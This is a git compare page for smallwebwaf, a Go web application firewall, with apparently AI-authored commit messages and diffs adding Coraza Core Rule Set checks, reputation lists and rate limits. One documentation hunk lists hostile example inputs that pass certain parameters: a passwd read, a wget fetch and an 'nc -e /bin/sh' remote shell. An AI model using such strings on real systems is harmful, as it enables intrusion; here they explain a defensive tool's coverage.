Compare commits

...
13 Commits
Author SHA1 Message Date
clawbot 6fcbda6ece Core Rule Set reads request bodies up to SWWAF_WAF_BODY_LIMIT (closes #116)
check / check (push) Waiting to run
SWWAF_WAF_BODY_LIMIT (default off, at most 1G) has the Core Rule Set read
form data and multipart up to the limit, the rest streaming on, and JSON
and XML no larger than it, with text/json and the application and text
types ending in +json or +xml. The part read is held for the app. A size
or time limit met while reading ends the request. Content-Encoding is
refused again on these kinds. A body Coraza cannot parse, or a multipart
body failing its strict checks, adds 5, as does a multipart body the limit
cuts in a part's headers before a colon or a line feed. Coraza is built
with no_fs_access, so writes no file. Rule 900300 moves to phase 2.

Judgement call: Content-Encoding is refused on a JSON or XML body too
large to read, as SPEC.md allows.

Model: opus-5-5
2026-10-08 12:59:13 +02:00
clawbot 80f4c2cc61 The Core Rule Set, run by Coraza, on each request's method, URL and headers (closes #25)
check / check (push) Waiting to run
Coraza v3.8.1 runs the Core Rule Set 4.25.0 (coraza-coreruleset v4.25.0)
after the rule files, with the six changes and the default
SWWAF_WAF_DISABLED_RULES that SPEC.md gives; no body, no response. The
parameter names in the third and fourth changes are matched in any case,
as Coraza does. SWWAF_WAF_DISABLED_RULES refuses 900000 to 900999,
smallwebwaf's own rules. A request with more than 1000 query parameters
adds 5 (rule 900300). In block mode a match is refused with 403, an
offence counted toward the error burst; in detect mode it is let
through. Both log waf_rule_ids, waf_score and duration_waf, raise
waf_block, and count smallwebwaf_waf_matches_total.

Judgement call: waf_block is raised in block mode too.
Deviation: no engine-error path; with no body read, Coraza cannot fail.

Model: opus-5-5
2026-10-08 09:37:13 +02:00
clawbot e81a7f0ca2 Tests that need a lookup answer give it an hour (closes #119)
check / check (push) Waiting to run
Twelve tests in internal/proxy needed the GeoJS stand-in to be asked or
to answer within the default SWWAF_LOOKUP_TIMEOUT of one second on the
real clock. A hold-up of the test process past it abandoned the request
to the stand-in, or left the client unknown. Each now sets
SWWAF_LOOKUP_TIMEOUT to an hour, and the comment on startGeoJS asks the
same of later tests.

Judgement call: set in each test, not as a default in newProxy, where it
would change two tests that rely on the default second.

Model: opus-5-5
2026-10-08 08:14:45 +02:00
clawbot 54779f08de Trap paths, and the error burst banning a client refused too often (closes #115)
check / check (push) Waiting to run
SWWAF_TRAP_PATHS: a request whose path, as a path rule sees it, is one
of them is a clear sign of attack, banned as a ban rule's match is; the
ban's notes give its trap_path. Checked after the rate limits, before the
rule files.

SWWAF_ERROR_BURST_THRESHOLD (default 30, or off): more refusals in a
minute after a block or ban rule or a trap path, or for a missing or
wrong token, ban the client as a broken limit does. Counted in
clients.json's minute_refusals; limit_hit error_burst, notes kind
refusals.

A token refusal is now the offence token_refused, and
smallwebwaf_offences_total counts every kind the history does.

Judgement call: the threshold is not lowered by a client's limit percentage.

Model: opus-5-5
2026-10-08 06:44:55 +02:00
clawbot 5f3fb48809 CrowdSec decision list fetched, kept, and its clients banned until the decision ends (closes #106)
check / check (push) Waiting to run
SWWAF_CROWDSEC_LAPI_URL and SWWAF_CROWDSEC_LAPI_KEY name an engine whose
decision list, <url>/v1/decisions, is fetched every minute with the key in
X-Api-Key, following no redirect, and kept as a blocklist is: used while a
fetch fails, and across restarts through reputation.json. Ban decisions on an
Ip or a Range end at the fetch time plus their duration. A listed client's
request is refused and bans its netblock with the cause crowdsec until the
decision ends; bans.json, ban notes and metrics take the cause.

Judgement call: fetched every minute, not a setting.
Judgement call: a crowdsec ban never lengthens a limit ban.
Judgement call: a lifted crowdsec ban is remade while its decision lasts.

Model: opus-5-5
2026-10-08 05:15:06 +02:00
clawbot 04e66d2069 Ban notes name the reputation sources that listed the client (closes #109)
check / check (push) Waiting to run
A ban's notes, in bans.json and in its alert, gain `reputation`: each
blocklist, DNSBL zone or AbuseIPDB that listed the client when the ban
was made, as its `source`, named and ordered as in the request log's
`reputation`, with AbuseIPDB's `score`. It is left out when none did.
README.md shows it in a bans.json example.

Notes now hold a list, so bans can no longer be compared with ==: the
tests compare them with reflect.DeepEqual.

Judgement call: the score is a pointer, so a score of 0, a hit while
SWWAF_ABUSEIPDB_MIN_SCORE is 0, is still written.

Model: opus-5-5
2026-10-08 03:08:01 +02:00
clawbot a6634454cd Read SWWAF_IPV6_GROUP_PREFIX, SWWAF_MAX_TRACKED_CLIENTS and SWWAF_LOG_LEVEL (closes #112)
check / check (push) Waiting to run
The IPv6 group that is one client, the size of the table of clients and
the level of the process's own lines become settings. clientGroup reads
the group length from them, so limits, bans, history, lookups, AbuseIPDB
scores and per-client anomaly counters all follow it; ratelimit.New
takes the table size; the process logger takes the level once the
settings are read, and request lines, written apart from it, are never
held back.

Judgement call: SWWAF_IPV6_GROUP_PREFIX accepts 32 to 128, the issue's example range.

Model: opus-5-5
2026-10-08 02:14:12 +02:00
clawbot ca787985f8 AbuseIPDB scores for clients that committed an offence, within a daily budget (closes #105)
check / check (push) Waiting to run
With SWWAF_ABUSEIPDB_KEY set, a client whose history counts an offence
(a broken limit, a ban rule's match or a block rule's refusal, counted
by kind) is checked in the background, at most
SWWAF_ABUSEIPDB_DAILY_BUDGET checks a day, the count kept in
reputation.json. A client, an IPv4 address or an IPv6 /64, is checked by
the address it sent from, and its score serves all its addresses. A
score at or over SWWAF_ABUSEIPDB_MIN_SCORE is a hit for
SWWAF_REPUTATION_ACTION, logged as abuseipdb and alerted with its score.
A failure or the used-up budget gives no score and raises
source_failure. The key goes only in the Key header.

Judgement call: the budget's day is UTC; AbuseIPDB documents no reset time.
Judgement call: each check sent spends budget; a minute's pause after a failure.

Model: opus-5-5
2026-10-07 22:47:06 +02:00
clawbot 0b0f207423 DNS blocklists asked in the background, verdicts kept (closes #104)
check / check (push) Waiting to run
Zones in SWWAF_DNSBL_ZONES are asked about each client in the background,
through SWWAF_DNSBL_RESOLVER or the host's resolver; no request waits.
Verdicts last SWWAF_REPUTATION_CACHE_TTL, kept in reputation.json.
SWWAF_REPUTATION_ACTION (limit:25) denies, limits or logs a listed
client; each zone listing it raises reputation_hit. A failed query gives
no verdict, raises source_failure, and pauses the zone a minute. A
zone's key, its first label under dq.spamhaus.net, is masked everywhere
but reputation.json. Zones compare without regard to case.

Judgement call: answers in 127.255.255.0/24 or outside 127.0.0.0/8 are failures.
Judgement call: the minute's pause after a failure; at most 1,000 queries at once.
Judgement call: one zone given with two keys stops the start as listed twice.
Rule suppressed: paralleltest on the DNSBL tests (Go's resolver shares state across synctest bubbles), funlen on the test of every logged setting.

Model: opus-5-5
2026-10-07 21:09:51 +02:00
clawbot 2b8c98ba1f Blocklists and an AS percentage file fetched by URL (closes #29)
check / check (push) Waiting to run
SWWAF_BLOCKLIST_URLS names lists of addresses and netblocks, fetched every
SWWAF_BLOCKLIST_REFRESH (24h, never under 1h); an IPv4-mapped line stands
for its IPv4 address or netblock. reputation.json keeps each list's last
try, failed or not, even one cut off by a stop, which a restart waits on
as a running instance does, and its last good copy, whole, used while a
fetch fails. SWWAF_BLOCKLIST_ACTION denies, limits or only logs a listed
client; the log line names the lists, each raises reputation_hit, and a
failed fetch raises source_failure. SWWAF_ASN_LIMIT_PERCENT_URL is fetched
the same way and counts as SWWAF_ASN_LIMIT_PERCENT does, the lower winning.

Judgement call: a failed fetch is retried after the refresh, not sooner.
Not done: ban notes do not name the lists yet.

Model: opus-5-5
2026-10-07 19:09:41 +02:00
clawbot 82e20e0cb5 Anomaly thresholds: alerts for unusual traffic, nothing refused (closes #101)
check / check (push) Waiting to run
SWWAF_ANOMALY_CLIENT_*, _NET_*, _ASN_*, _TOTAL_* and SWWAF_WATCH_* with
SWWAF_WATCH_NETS: requests and bytes per minute and per hour, each off by
default; with all off, nothing is counted. Otherwise every request but the
health check is counted, allow-listed and exempt ones included; a count
over its threshold raises an anomaly alert, with a cooldown per scope. At
most 20,000 counters, kept in alerts.json. A per-AS-number threshold with
lookups off, or a malformed SWWAF_WATCH_NETS, stops the start. A cooldown
that has run out is dropped as the hour ends, whatever it held back; the
hour's summary gives its repeats.

Judgement call: refused requests are counted too.
Judgement call: per-client counters are kept in alerts.json, which SPEC.md does not list.
Judgement call: a request counts for an AS number only if the lookup answered before it ended.

Model: opus-5-5
2026-10-07 16:12:19 +02:00
clawbot 2421cdc273 Lower limits for listed AS numbers and countries (closes #21)
check / check (push) Canceled after 0s
SWWAF_ASN_LIMIT_PERCENT and SWWAF_COUNTRY_LIMIT_PERCENT give the clients
of the AS numbers and countries they list that percentage of every rate
and byte limit, rounded down; SWWAF_ASN_BYTES_PERCENT and
SWWAF_COUNTRY_BYTES_PERCENT take its place for the byte limits of those
they list; SWWAF_UNKNOWN_LIMIT_PERCENT (100) covers clients without a
country. The lowest applies. While one lowers a limit, a request waits
for its client's lookup, and SWWAF_LOOKUP_SOURCE=off stops the start. Log
lines give limit_percent and bytes_percent with their settings; ban
notes, and so alerts, give the broken limit's.

Judgement call: a client without a country is unknown, whatever its AS number.
Judgement call: bytes_percent and its setting are log fields SPEC does not name.
Rule suppressed: funlen on FromEnvironment, one line per setting.

Model: opus-5-5
2026-10-07 14:22:01 +02:00
clawbot f35e3ddfe8 Byte limits per client over a minute, an hour and a day (closes #20)
check / check (push) Canceled after 0s
SWWAF_BYTES_LIMIT_PER_MINUTE, _PER_HOUR and _PER_DAY (10G, 20G, 50G)
and SWWAF_BYTES_COUNT (both). A request's bytes are counted once its
answer has ended, for a request passed to the app that the rate limits
count; what a WebSocket carries each way, once it closes. Bytes over a
limit ban the client as a broken rate limit does, and cut nothing
short. clients.json keeps the byte buckets, the log line's counts carry
the byte totals, ban notes say what the limit is on, and the limit hits
metric is labelled by kind.

Judgement call: limit_hit names a byte window minute_bytes, hour_bytes
or day_bytes, as counts names the byte totals.
Judgement call: in observe mode, the bytes of a request enforce mode
would have refused are not counted.

Model: opus-5-5
2026-10-07 13:13:06 +02:00
74 changed files with 16106 additions and 936 deletions
+9 -5
View File
@@ -36,11 +36,12 @@ RUN go mod tidy -diff || \
{ echo "go.mod or go.sum is not tidy: run make tidy" >&2; exit 1; } { echo "go.mod or go.sum is not tidy: run make tidy" >&2; exit 1; }
# Go's build cache is kept on a tmpfs, out of the image: nothing uses it # Go's build cache is kept on a tmpfs, out of the image: nothing uses it
# after this step, and writing it into the image takes seconds. # after this step, and writing it into the image takes seconds. The tests
# are built with the no_fs_access tag, as the binary is in the build stage.
RUN --mount=type=tmpfs,target=/root/.cache/go-build \ RUN --mount=type=tmpfs,target=/root/.cache/go-build \
go test -timeout 90s -race -cover ./... || \ go test -tags no_fs_access -timeout 90s -race -cover ./... || \
{ echo "--- Rerunning with -v for details ---"; \ { echo "--- Rerunning with -v for details ---"; \
go test -timeout 90s -race -v ./...; exit 1; } go test -tags no_fs_access -timeout 90s -race -v ./...; exit 1; }
# Tidy stage: `go mod tidy` in the test phase's Go, so that the files it # Tidy stage: `go mod tidy` in the test phase's Go, so that the files it
# writes pass the test phase's check. Nothing else depends on it, so only # writes pass the test phase's check. Nothing else depends on it, so only
@@ -84,7 +85,10 @@ COPY . .
# The VERSION build arg when one is given, otherwise # The VERSION build arg when one is given, otherwise
# `git describe --tags --always` on the .git in the build context. With # `git describe --tags --always` on the .git in the build context. With
# .git present, a version that is still empty, dev or unknown fails the # .git present, a version that is still empty, dev or unknown fails the
# build: git is missing or could not read the checkout. # build: git is missing or could not read the checkout. The no_fs_access
# tag keeps Coraza from writing the files of a multipart body to the
# system's temporary directory, since smallwebwaf writes only to its state
# directory.
ARG VERSION ARG VERSION
RUN VERSION="${VERSION:-$(git describe --tags --always)}"; \ RUN VERSION="${VERSION:-$(git describe --tags --always)}"; \
if [ -e .git ]; then \ if [ -e .git ]; then \
@@ -93,7 +97,7 @@ RUN VERSION="${VERSION:-$(git describe --tags --always)}"; \
exit 1 ;; \ exit 1 ;; \
esac; \ esac; \
fi; \ fi; \
CGO_ENABLED=0 go build -trimpath \ CGO_ENABLED=0 go build -tags no_fs_access -trimpath \
-ldflags="-s -w -X main.Version=${VERSION}" \ -ldflags="-s -w -X main.Version=${VERSION}" \
-o /usr/local/bin/smallwebwaf ./cmd/smallwebwaf -o /usr/local/bin/smallwebwaf ./cmd/smallwebwaf
+1201 -291
View File
File diff suppressed because it is too large Load Diff
+6 -4
View File
@@ -618,10 +618,12 @@ The settings, by group:
`|cat /etc/passwd`, `wget http://…` and `nc -e /bin/sh …`, and `|cat /etc/passwd`, `wget http://…` and `nc -e /bin/sh …`, and
`file:///etc/passwd`, pass as well. Path traversal (`../`), SQL and `file:///etc/passwd`, pass as well. Path traversal (`../`), SQL and
script injection and PHP, Java and Node.js code are still refused script injection and PHP, Java and Node.js code are still refused
there, and every other parameter keeps all three rules. An app that there, and every other parameter keeps all three rules. These names,
uses one of these parameters as a file on the server, or passes it to and `redirect_uri` in the change before, are matched without regard to
a shell, gets no help from the three rules there (see "Risks the case, as Coraza matches them, so `Path` or `PATH` is treated as
design has to handle"). `path`. An app that uses one of these parameters as a file on the
server, or passes it to a shell, gets no help from the three rules
there (see "Risks the design has to handle").
- The Core Rule Set reads the request without the `gitea_flash` and - The Core Rule Set reads the request without the `gitea_flash` and
`redirect_to` cookies, and does not check `Referer` for a Unix command `redirect_to` cookies, and does not check `Referer` for a Unix command
given without arguments (932340) or for Java starting a process given without arguments (932340) or for Java starting a process
+19
View File
@@ -3,6 +3,8 @@ module sneak.berlin/go/smallwebwaf
go 1.26.0 go 1.26.0
require ( require (
github.com/corazawaf/coraza-coreruleset/v4 v4.25.0
github.com/corazawaf/coraza/v3 v3.8.1
github.com/fsnotify/fsnotify v1.10.1 github.com/fsnotify/fsnotify v1.10.1
github.com/hashicorp/golang-lru/v2 v2.0.7 github.com/hashicorp/golang-lru/v2 v2.0.7
github.com/maxmind/mmdbwriter v1.2.0 github.com/maxmind/mmdbwriter v1.2.0
@@ -13,12 +15,29 @@ require (
require ( require (
github.com/beorn7/perks v1.0.1 // indirect github.com/beorn7/perks v1.0.1 // indirect
github.com/cespare/xxhash/v2 v2.3.0 // indirect github.com/cespare/xxhash/v2 v2.3.0 // indirect
github.com/corazawaf/libinjection-go v0.3.3 // indirect
github.com/goccy/go-json v0.10.5 // indirect
github.com/goccy/go-yaml v1.19.2 // indirect
github.com/gotnospirit/makeplural v0.0.0-20180622080156-a5f48d94d976 // indirect
github.com/gotnospirit/messageformat v0.0.0-20221001023931-dfe49f1eb092 // indirect
github.com/kaptinlin/go-i18n v0.1.4 // indirect
github.com/kaptinlin/jsonschema v0.4.6 // indirect
github.com/kylelemons/godebug v1.1.0 // indirect github.com/kylelemons/godebug v1.1.0 // indirect
github.com/magefile/mage v1.17.0 // indirect
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 // indirect github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 // indirect
github.com/petar-dambovaliev/aho-corasick v0.0.0-20250424160509-463d218d4745 // indirect
github.com/prometheus/client_model v0.6.2 // indirect github.com/prometheus/client_model v0.6.2 // indirect
github.com/prometheus/common v0.70.1 // indirect github.com/prometheus/common v0.70.1 // indirect
github.com/prometheus/procfs v0.21.1 // indirect github.com/prometheus/procfs v0.21.1 // indirect
github.com/tidwall/gjson v1.18.0 // indirect
github.com/tidwall/match v1.1.1 // indirect
github.com/tidwall/pretty v1.2.1 // indirect
github.com/valllabh/ocsf-schema-golang v1.0.3 // indirect
go4.org/netipx v0.0.0-20231129151722-fdeea329fbba // indirect go4.org/netipx v0.0.0-20231129151722-fdeea329fbba // indirect
golang.org/x/net v0.58.0 // indirect
golang.org/x/sync v0.23.0 // indirect
golang.org/x/sys v0.48.0 // indirect golang.org/x/sys v0.48.0 // indirect
golang.org/x/text v0.41.0 // indirect
google.golang.org/protobuf v1.36.11 // indirect google.golang.org/protobuf v1.36.11 // indirect
rsc.io/binaryregexp v0.2.0 // indirect
) )
+55
View File
@@ -2,22 +2,54 @@ github.com/beorn7/perks v1.0.1 h1:VlbKKnNfV8bJzeqoa4cOKqO6bYr3WgKZxO8Z16+hsOM=
github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw= github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw=
github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs= github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs=
github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
github.com/corazawaf/coraza-coreruleset v0.0.0-20240226094324-415b1017abdc h1:OlJhrgI3I+FLUCTI3JJW8MoqyM78WbqJjecqMnqG+wc=
github.com/corazawaf/coraza-coreruleset v0.0.0-20240226094324-415b1017abdc/go.mod h1:7rsocqNDkTCira5T0M7buoKR2ehh7YZiPkzxRuAgvVU=
github.com/corazawaf/coraza-coreruleset/v4 v4.25.0 h1:tqFO1lfVpTiyWtlN618OXpZMfw+nnN0Q4///W5W+/HM=
github.com/corazawaf/coraza-coreruleset/v4 v4.25.0/go.mod h1:nRuGXITxOPvsLF2VxaTB7pYok8QB8BitX3ZenXcUryY=
github.com/corazawaf/coraza/v3 v3.8.1 h1:dMV55FbMR2vOks/acrT43RShR+VkzU6jwp+XPdxay8o=
github.com/corazawaf/coraza/v3 v3.8.1/go.mod h1:nPVk2JqADYBcKLYvo9cRsr+z4JhanU0WniGhZZBZD6c=
github.com/corazawaf/libinjection-go v0.3.3 h1:NhbXKRfRpqKzBMzv8zpCcnjyEw7BCVhBOv9IPuBl7Fc=
github.com/corazawaf/libinjection-go v0.3.3/go.mod h1:Ik/+w3UmTWH9yn366RgS9D95K3y7Atb5m/H/gXzzPCk=
github.com/foxcpp/go-mockdns v1.2.0 h1:omK3OrHRD1IWJz1FuFBCFquhXslXoF17OvBS6JPzZF0=
github.com/foxcpp/go-mockdns v1.2.0/go.mod h1:IhLeSFGed3mJIAXPH2aiRQB+kqz7oqu8ld2qVbOu7Wk=
github.com/fsnotify/fsnotify v1.10.1 h1:b0/UzAf9yR5rhf3RPm9gf3ehBPpf0oZKIjtpKrx59Ho= github.com/fsnotify/fsnotify v1.10.1 h1:b0/UzAf9yR5rhf3RPm9gf3ehBPpf0oZKIjtpKrx59Ho=
github.com/fsnotify/fsnotify v1.10.1/go.mod h1:TLheqan6HD6GBK6PrDWyDPBaEV8LspOxvPSjC+bVfgo= github.com/fsnotify/fsnotify v1.10.1/go.mod h1:TLheqan6HD6GBK6PrDWyDPBaEV8LspOxvPSjC+bVfgo=
github.com/goccy/go-json v0.10.5 h1:Fq85nIqj+gXn/S5ahsiTlK3TmC85qgirsdTP/+DeaC4=
github.com/goccy/go-json v0.10.5/go.mod h1:oq7eo15ShAhp70Anwd5lgX2pLfOS3QCiwU/PULtXL6M=
github.com/goccy/go-yaml v1.19.2 h1:PmFC1S6h8ljIz6gMRBopkjP1TVT7xuwrButHID66PoM=
github.com/goccy/go-yaml v1.19.2/go.mod h1:XBurs7gK8ATbW4ZPGKgcbrY1Br56PdM69F7LkFRi1kA=
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
github.com/gotnospirit/makeplural v0.0.0-20180622080156-a5f48d94d976 h1:b70jEaX2iaJSPZULSUxKtm73LBfsCrMsIlYCUgNGSIs=
github.com/gotnospirit/makeplural v0.0.0-20180622080156-a5f48d94d976/go.mod h1:ZGQeOwybjD8lkCjIyJfqR5LD2wMVHJ31d6GdPxoTsWY=
github.com/gotnospirit/messageformat v0.0.0-20221001023931-dfe49f1eb092 h1:c7gcNWTSr1gtLp6PyYi3wzvFCEcHJ4YRobDgqmIgf7Q=
github.com/gotnospirit/messageformat v0.0.0-20221001023931-dfe49f1eb092/go.mod h1:ZZAN4fkkful3l1lpJwF8JbW41ZiG9TwJ2ZlqzQovBNU=
github.com/hashicorp/golang-lru/v2 v2.0.7 h1:a+bsQ5rvGLjzHuww6tVxozPZFVghXaHOwFs4luLUK2k= github.com/hashicorp/golang-lru/v2 v2.0.7 h1:a+bsQ5rvGLjzHuww6tVxozPZFVghXaHOwFs4luLUK2k=
github.com/hashicorp/golang-lru/v2 v2.0.7/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM= github.com/hashicorp/golang-lru/v2 v2.0.7/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM=
github.com/jcchavezs/mergefs v0.1.1 h1:D45R17m6dHnSVZefnhynoeZvcK2Uw0oTrRfoUOQ0S5Y=
github.com/jcchavezs/mergefs v0.1.1/go.mod h1:eRLTrsA+vFwQZ48hj8p8gki/5v9C2bFtHH5Mnn4bcGk=
github.com/kaptinlin/go-i18n v0.1.4 h1:wCiwAn1LOcvymvWIVAM4m5dUAMiHunTdEubLDk4hTGs=
github.com/kaptinlin/go-i18n v0.1.4/go.mod h1:g1fn1GvTgT4CiLE8/fFE1hboHWJ6erivrDpiDtCcFKg=
github.com/kaptinlin/jsonschema v0.4.6 h1:vOSFg5tjmfkOdKg+D6Oo4fVOM/pActWu/ntkPsI1T64=
github.com/kaptinlin/jsonschema v0.4.6/go.mod h1:1DUd7r5SdyB2ZnMtyB7uLv64dE3zTFTiYytDCd+AEL0=
github.com/klauspost/compress v1.19.1 h1:VsB4HPswih7mmZ8WleSFQ75c/Ui1M4trX5oAsJnhSlk= github.com/klauspost/compress v1.19.1 h1:VsB4HPswih7mmZ8WleSFQ75c/Ui1M4trX5oAsJnhSlk=
github.com/klauspost/compress v1.19.1/go.mod h1:cwPg85FWrGar70rWktvGQj8/hthj3wpl0PGDogxkrSQ= github.com/klauspost/compress v1.19.1/go.mod h1:cwPg85FWrGar70rWktvGQj8/hthj3wpl0PGDogxkrSQ=
github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc= github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc=
github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw= github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw=
github.com/magefile/mage v1.17.0 h1:dS4tkq997Ism03akafC8509iqDjeE7TNTexI25Y7sXM=
github.com/magefile/mage v1.17.0/go.mod h1:Yj51kqllmsgFpvvSzgrZPK9WtluG3kUhFaBUVLo4feA=
github.com/maxmind/mmdbwriter v1.2.0 h1:hyvDopImmgvle3aR8AaddxXnT0iQH2KWJX3vNfkwzYM= github.com/maxmind/mmdbwriter v1.2.0 h1:hyvDopImmgvle3aR8AaddxXnT0iQH2KWJX3vNfkwzYM=
github.com/maxmind/mmdbwriter v1.2.0/go.mod h1:EQmKHhk2y9DRVvyNxwCLKC5FrkXZLx4snc5OlLY5XLE= github.com/maxmind/mmdbwriter v1.2.0/go.mod h1:EQmKHhk2y9DRVvyNxwCLKC5FrkXZLx4snc5OlLY5XLE=
github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM=
github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk=
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 h1:C3w9PqII01/Oq1c1nUAm88MOHcQC9l5mIlSMApZMrHA= github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 h1:C3w9PqII01/Oq1c1nUAm88MOHcQC9l5mIlSMApZMrHA=
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822/go.mod h1:+n7T8mK8HuQTcFwEeznm/DIxMOiR9yIdICNftLE1DvQ= github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822/go.mod h1:+n7T8mK8HuQTcFwEeznm/DIxMOiR9yIdICNftLE1DvQ=
github.com/oschwald/maxminddb-golang/v2 v2.7.0 h1:ZcAr3GYc2LYC8aec2mCMX9+QOF0EolH3jDFKRV/Z1+U= github.com/oschwald/maxminddb-golang/v2 v2.7.0 h1:ZcAr3GYc2LYC8aec2mCMX9+QOF0EolH3jDFKRV/Z1+U=
github.com/oschwald/maxminddb-golang/v2 v2.7.0/go.mod h1:DuKJLbbug6TXC0yJXgs1MWifvXHmudRWzMobMIUu04g= github.com/oschwald/maxminddb-golang/v2 v2.7.0/go.mod h1:DuKJLbbug6TXC0yJXgs1MWifvXHmudRWzMobMIUu04g=
github.com/pelletier/go-toml/v2 v2.2.4 h1:mye9XuhQ6gvn5h28+VilKrrPoQVanw5PMw/TB0t5Ec4=
github.com/pelletier/go-toml/v2 v2.2.4/go.mod h1:2gIqNv+qfxSVS7cM2xJQKtLSTLUE9V8t9Stt+h56mCY=
github.com/petar-dambovaliev/aho-corasick v0.0.0-20250424160509-463d218d4745 h1:Vpr4VgAizEgEZsaMohpw6JYDP+i9Of9dmdY4ufNP6HI=
github.com/petar-dambovaliev/aho-corasick v0.0.0-20250424160509-463d218d4745/go.mod h1:EHPiTAKtiFmrMldLUNswFwfZ2eJIYBHktdaUTZxYWRw=
github.com/prometheus/client_golang v1.24.1 h1:JnJkREXzWxUdCuPFpIWZiPispT9xVV59uiuyR2bPlnU= github.com/prometheus/client_golang v1.24.1 h1:JnJkREXzWxUdCuPFpIWZiPispT9xVV59uiuyR2bPlnU=
github.com/prometheus/client_golang v1.24.1/go.mod h1:F+oSRECHg4sse5ucfYpYDeIv/hu68Zo0uoHKetWnzcE= github.com/prometheus/client_golang v1.24.1/go.mod h1:F+oSRECHg4sse5ucfYpYDeIv/hu68Zo0uoHKetWnzcE=
github.com/prometheus/client_model v0.6.2 h1:oBsgwpGs7iVziMvrGhE53c/GrLUsZdHnqNwqPLxwZyk= github.com/prometheus/client_model v0.6.2 h1:oBsgwpGs7iVziMvrGhE53c/GrLUsZdHnqNwqPLxwZyk=
@@ -28,6 +60,15 @@ github.com/prometheus/procfs v0.21.1 h1:GljZCt+zSTS+NZq88cyQ1LjZ+RCHp3uVuabBWA5+
github.com/prometheus/procfs v0.21.1/go.mod h1:aB55Cww9pdSJVHk0hUf0inxWyyjPogFIjmHKYgMKmtY= github.com/prometheus/procfs v0.21.1/go.mod h1:aB55Cww9pdSJVHk0hUf0inxWyyjPogFIjmHKYgMKmtY=
github.com/stretchr/testify v1.12.1 h1:EuwCh5fleGS7H32xRwO3wRGT7DxrDhLAT6FF8MpWDWE= github.com/stretchr/testify v1.12.1 h1:EuwCh5fleGS7H32xRwO3wRGT7DxrDhLAT6FF8MpWDWE=
github.com/stretchr/testify v1.12.1/go.mod h1:MDEgiDPPsNp5cuIrHPPCyornHKgEVbtFUmoNlxoYthg= github.com/stretchr/testify v1.12.1/go.mod h1:MDEgiDPPsNp5cuIrHPPCyornHKgEVbtFUmoNlxoYthg=
github.com/tidwall/gjson v1.18.0 h1:FIDeeyB800efLX89e5a8Y0BNH+LOngJyGrIWxG2FKQY=
github.com/tidwall/gjson v1.18.0/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk=
github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA=
github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM=
github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU=
github.com/tidwall/pretty v1.2.1 h1:qjsOFOWWQl+N3RsoF5/ssm1pHmJJwhjlSbZ51I6wMl4=
github.com/tidwall/pretty v1.2.1/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU=
github.com/valllabh/ocsf-schema-golang v1.0.3 h1:eR8k/3jP/OOqB8LRCtdJ4U+vlgd/gk5y3KMXoodrsrw=
github.com/valllabh/ocsf-schema-golang v1.0.3/go.mod h1:sZ3as9xqm1SSK5feFWIR2CuGeGRhsM7TR1MbpBctzPk=
go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto= go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto=
go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE= go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE=
go.yaml.in/yaml/v2 v2.4.4 h1:tuyd0P+2Ont/d6e2rl3be67goVK4R6deVxCUX5vyPaQ= go.yaml.in/yaml/v2 v2.4.4 h1:tuyd0P+2Ont/d6e2rl3be67goVK4R6deVxCUX5vyPaQ=
